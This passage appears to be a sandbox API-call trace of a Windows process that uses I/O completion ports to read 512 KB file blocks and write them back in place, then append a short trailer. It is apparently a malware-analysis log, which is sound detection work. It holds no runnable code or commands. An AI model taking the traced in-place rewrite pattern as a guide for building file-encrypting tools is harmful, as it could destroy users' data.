(in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 0 [0150.827] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4940020) returned 1 [0150.828] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0150.828] CloseHandle (hObject=0x66c) returned 1 [0150.848] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4280020) returned 1 [0150.848] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0150.848] CloseHandle (hObject=0x134) returned 1 [0150.854] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4940020) returned 1 [0150.854] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0150.929] WriteFile (in: hFile=0x674, lpBuffer=0x4670124*, nNumberOfBytesToWrite=0x11394, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4670020) returned 1 [0151.077] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0151.077] ReadFile (in: hFile=0x674, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x4670020) returned 0x0 [0151.077] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 0 [0151.078] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0151.078] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0151.078] WriteFile (in: hFile=0x674, lpBuffer=0x4670094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4670020 | out: lpBuffer=0x4670094*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4670020) returned 1 [0151.097] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0151.097] CloseHandle (hObject=0x674) returned 1 [0151.102] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4670020) returned 1 [0151.103] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0151.195] ReadFile (in: hFile=0x1a8, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x2f30020) returned 1 [0151.195] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0151.195] ReadFile (in: hFile=0x610, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x4280020) returned 1 [0151.195] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0151.196] WriteFile (in: hFile=0x1a8, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x1959, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x2f30020) returned 1 [0151.289] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0151.289] ReadFile (in: hFile=0x1a8, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0151.289] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 0 [0151.289] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0151.289] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0151.289] WriteFile (in: hFile=0x1a8, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x2f30020) returned 1 [0151.304] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0151.304] ReadFile (in: hFile=0x674, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x4700020) returned 1 [0151.305] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0151.305] CloseHandle (hObject=0x1a8) returned 1 [0151.312] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0151.312] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0155.511] WriteFile (in: hFile=0x1a8, lpBuffer=0x4670124*, nNumberOfBytesToWrite=0x6d5a, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4670020) returned 1 [0155.515] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 0 [0155.517] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0155.517] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0155.518] CloseHandle (hObject=0x65c) returned 1 [0155.526] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x41f0020) returned 1 [0155.526] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0155.578] ReadFile (in: hFile=0x658, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x2f30020) returned 1 [0155.578] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0155.579] CloseHandle (hObject=0x65c) returned 1 [0155.583] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2880020) returned 1 [0155.583] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0155.998] WriteFile (in: hFile=0x674, lpBuffer=0x41f0124, nNumberOfBytesToWrite=0x176c0, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 0x0 [0156.004] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0156.007] WriteFile (in: hFile=0x648, lpBuffer=0x49d0124*, nNumberOfBytesToWrite=0x1451, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x49d0020) returned 1 [0156.031] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 0 [0156.034] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4790020) returned 1 [0156.034] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 0 [0156.035] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x48b0020) returned 1 [0156.035] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 0 [0156.035] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x49d0020) returned 1 [0156.035] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 0 [0156.035] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4af0020) returned 1 [0156.035] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0156.035] WriteFile (in: hFile=0x65c, lpBuffer=0x2910094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x2910020 | out: lpBuffer=0x2910094*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x2910020) returned 1 [0156.041] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0156.041] WriteFile (in: hFile=0x61c, lpBuffer=0x4790094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4790020 | out: lpBuffer=0x4790094*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4790020) returned 1 [0156.045] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0156.066] CloseHandle (hObject=0x674) returned 1 [0156.076] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x41f0020) returned 1 [0156.076] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0156.076] CloseHandle (hObject=0x640) returned 1 [0156.086] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x48b0020) returned 1 [0156.087] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0156.090] WriteFile (in: hFile=0x1c, lpBuffer=0x4e50094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4e50020 | out: lpBuffer=0x4e50094*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4e50020) returned 1 [0156.096] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0156.096] CloseHandle (hObject=0x620) returned 1 [0156.116] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4d30020) returned 1 [0156.116] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 Thread: id = 131 os_tid = 0x364 [0136.132] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0136.399] ReadFile (in: hFile=0x614, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 1 [0136.444] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0136.446] WriteFile (in: hFile=0x614, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020) returned 1 [0136.456] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0136.456] ReadFile (in: hFile=0x614, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 1 [0136.529] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0136.530] WriteFile (in: hFile=0x614, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020) returned 1 [0136.532] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0136.532] ReadFile (in: hFile=0x614, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 1 [0136.604] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0136.605] WriteFile (in: hFile=0x614, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020) returned 1 [0136.607] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0136.607] ReadFile (in: hFile=0x614, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 1 [0136.607] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0136.609] WriteFile (in: hFile=0x614, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020) returned 1 [0136.610] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0136.610] ReadFile (in: hFile=0x614, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 1 [0136.745] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0136.747] WriteFile (in: hFile=0x614, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020) returned 1 [0136.750] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0136.750] ReadFile (in: hFile=0x614, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 1 [0136.751] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0136.753] WriteFile (in: hFile=0x614, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020) returned 1 [0136.754] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0136.754] ReadFile (in: hFile=0x614, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 1 [0136.773] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0136.773] WriteFile (in: hFile=0x614, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x6000, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020) returned 1 [0136.774] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0136.774] ReadFile (in: hFile=0x614, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0136.774] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0136.774] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0136.774] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0136.774] WriteFile (in: hFile=0x614, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020) returned 1 [0136.774] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, 